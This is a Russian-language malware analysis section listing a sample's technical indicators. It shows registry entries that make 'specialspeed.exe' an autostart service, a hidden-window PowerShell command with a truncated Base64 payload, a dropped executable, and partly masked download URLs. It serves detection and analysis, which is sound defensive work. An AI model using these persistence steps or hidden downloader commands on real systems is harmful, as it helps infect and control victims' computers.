Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\specialspeed] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\specialspeed] 'ImagePath' = '"%WINDIR%\SysWOW64\specialspeed.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...
- %HOMEPATH%\160.exe
- %HOMEPATH%\160.exe в %WINDIR%\syswow64\specialspeed.exe
- http://sa####patil.online/wp-includes/rBhbqf/
- http://15#.#83.25.24/xvnMKSjntiYV
- DNS ASK sa####patil.online
- '%HOMEPATH%\160.exe'
- '%WINDIR%\syswow64\specialspeed.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...' (со скрытым окном)